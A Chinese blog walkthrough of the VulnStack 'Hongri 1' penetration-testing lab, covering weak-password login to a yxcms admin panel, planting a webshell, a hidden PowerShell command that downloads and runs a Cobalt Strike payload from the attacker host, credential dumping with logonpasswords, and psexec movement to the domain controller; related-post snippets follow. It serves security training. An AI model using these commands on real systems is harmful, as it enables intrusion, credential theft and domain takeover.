ATT&CK 红日1靶机渗透攻略

最新推荐文章于 2024-04-14 07:52:47 发布
最新推荐文章于 2024-04-14 07:52:47 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: ATT&CK红日靶场实战系列 文章标签: 安全 web安全 网络 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122718016
版权

环境

此实战靶场共 3 台主机,Win7 作为 Web 服务器,是打入此实战靶场的第一个目标和 入手点,Win2K3 为内网域成员主机,WinSever 2008 R2 为内网域控主机。

下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

在这里插入图片描述

环境调试

网卡桥接

主机网卡IP
win7(web服务器)1.VM2 2.NAT192.168.52.143 and 192.168.8.142
win2003(内网域成员)1.VM2192.168.52.141
win2008(内网域控)1.VM2192.168.52.138
kail(攻击方)1.NAT192.168.8.131

win7:

在这里插入图片描述

win2003:

在这里插入图片描述

win2008

在这里插入图片描述

kali:

在这里插入图片描述

连通性验证

靶机初始密码hongrisec@2019 本地已经改成123.com

win7与所有主机均可通信

2003和2008互通

kali只能与win7ping通

环境调试

win7开启phpstudy

在这里插入图片描述

访问成功

在这里插入图片描述

信息收集

namp端口扫描

nmap -sS -p- 192.168.8.142

在这里插入图片描述

80主页是phpstudy探针,查看后并无实际价值

在这里插入图片描述

网站后台扫描

在这里插入图片描述

下载beifen.rar

在这里插入图片描述

推测存在yxcms…没扫出来估计是字典不行吧

在这里插入图片描述

漏洞利用

web漏洞利用

弱口令

一个非常明显的弱口令

在这里插入图片描述

admin 123456成功登录后台

上传一句话木马

进入前台模板管理写入一句话木马

在这里插入图片描述

通过之前下载的beifen文件可知前台页面路径

http://192.168.8.142/yxcms/protected/apps/default/view/default/muma.php

在这里插入图片描述

蚁剑连接

在这里插入图片描述

cs上线

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.131:80/a'))"

生成监听器

在这里插入图片描述

生成Scripted Web Delivery

在这里插入图片描述

在这里插入图片描述

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.131:8080/a'))"

复制命令,蚁剑shell执行

在这里插入图片描述

cs上线win7,上线会慢一点,上线后更改sleep时间

在这里插入图片描述

内网主机探测

shell ipconfig发现存在内网网段192.168.52.0/24

在这里插入图片描述

portscan 192.168.52.0-192.168.52.255 1-1024,3389,5000-6000 arp 1024

在这里插入图片描述

发现192.168.52.143 192.168.52.141 192.168.52.138

域内信息收集

域主机探测
net computers

在这里插入图片描述

dc探测
net dclist

在这里插入图片描述

导出webserver主机密码

logonpasswords

在这里插入图片描述

新建smb监听器

在这里插入图片描述

dc上线

目标–psexec

在这里插入图片描述

在这里插入图片描述

Forest深林
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021-7-7红日团队靶场一
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
ISIS基础实验(ATT、路由负载分担、路由渗透、认证)
padefe123的博客
11-16 1652
中间系统到中间系IS-IS属于内部网关协议IGP,一种链路状态路由协议,直连设备之间通过发送Hello报文发现彼此,然后建立邻接关系,交互链路状态信息的。
红日(vulnstack)1 内网渗透ATT&CK实战
m0_66299232的博客
02-27 677
8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3。kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4。开启之后数据库所有运行的日志会记录在general_log_file中。4.net use 发现建立成功后,上传木马程序。1.开启cs,生成木马,上传到蚁剑,执行。6.成功执行,whomi发现是系统权限。红日
内网域渗透总结——红日靶场①_红日靶机账号密码(1),2024年最新网络安全面试题2024笔试
最新发布
sffhhr的博客
04-14 732
​​​。
红日一(内网渗透
qq_46487664的博客
03-29 136
选择一个属于域的凭证信息,监听器选择smb,会话选择获取的stu1。点击视图,查看凭证信息,查看相关用户的密码和ntlm-hash。添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)添加图片注释,不超过 140 字(可选)
记录一次内网渗透过程,ATT&CK实战| VulnStack红队(五)靶场
weixin_46263525的博客
05-29 397
记录一次内网渗透过程,ATT&CK实战| VulnStack红队(五)靶场
红日靶场学习笔记【1】
m0_46127592的博客
04-01 2938
这篇文章主要记录一下我玩红日靶场(1)的一些过程以及在这期间学习到的一些东西
红日靶场第一关
红队是青春
11-16 6817
红日靶场第一关 一、环境配置 NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163 二、目标 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 9712
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
渗透测试之——红日靶机(一)
weixin_43072923的博客
04-25 693
红日靶机练习
红日靶机vulnstack01【精华总结】
qq_45300786的博客
07-22 2799
总结:一 如果3389开放,但是用防火墙:那么有3中方法突破 1、msf反弹shell,然后使用run post/windows/manage/enable_rdp,意思是防火墙允许远程桌面 2、msf反弹shell,命令行直接添加防火墙3389开放规则 netsh advfirewall firewall add rule name=“Open 3389” dir=in action=allow protocol=TCP localport=3389 3、使用隧道:目标机有防火墙的话,我们是被目标机防火墙
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御...movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
ATT&CK手册(修改版)
09-16
ATT&CK手册(修改版)
ATT&CK 知识库(企业)中文版1
08-03
1.1 路过式下载 1 1.2 面向公众应用的利用 2 1.3 外部远程服务 3 1.4 硬件添加 4 1.5 通过移动存储进行复制 5 1.6 鱼叉式钓鱼攻击
ATT&CK框架介绍及战技术对照表
05-18
ATT&CK框架介绍及战技术对照表
红日-VulnStack靶场-ATT&CK(一)横向渗透两种方法
braty_的博客
09-26 488
红日-VulnStack靶场-ATT&CK(一),分享两种内网横向渗透的方法。
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 8018
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1:192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1:192.168.52.141 Windows Server 2008 R2 x64 VMnet1:192.168.52.138 kali V
红队攻防知识分享-红日安全团队靶场1-速通版
beirry的博客
04-14 2954
此版本是根据日常实战中来渗透攻击,如果为了学习,建议先看学习版本 外网打点 端口扫描 通过扫描端口得知web站点开启 目录扫描 得到用的数据库是mysql和一个站点的备份文件 通过文件包拼接得到站点url:http://192.168.54.128/yxcms,使用的cms是yxcms,版本为1.2.1 知道yxcms,直接百度找已知漏洞 访问站点后台,尝试默认密码admin,123456 通过百度得知,编辑前台模板的功能可以插入一句话木马,则直接拿webshell, 获取路径,直接在备份包里搜索前台
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值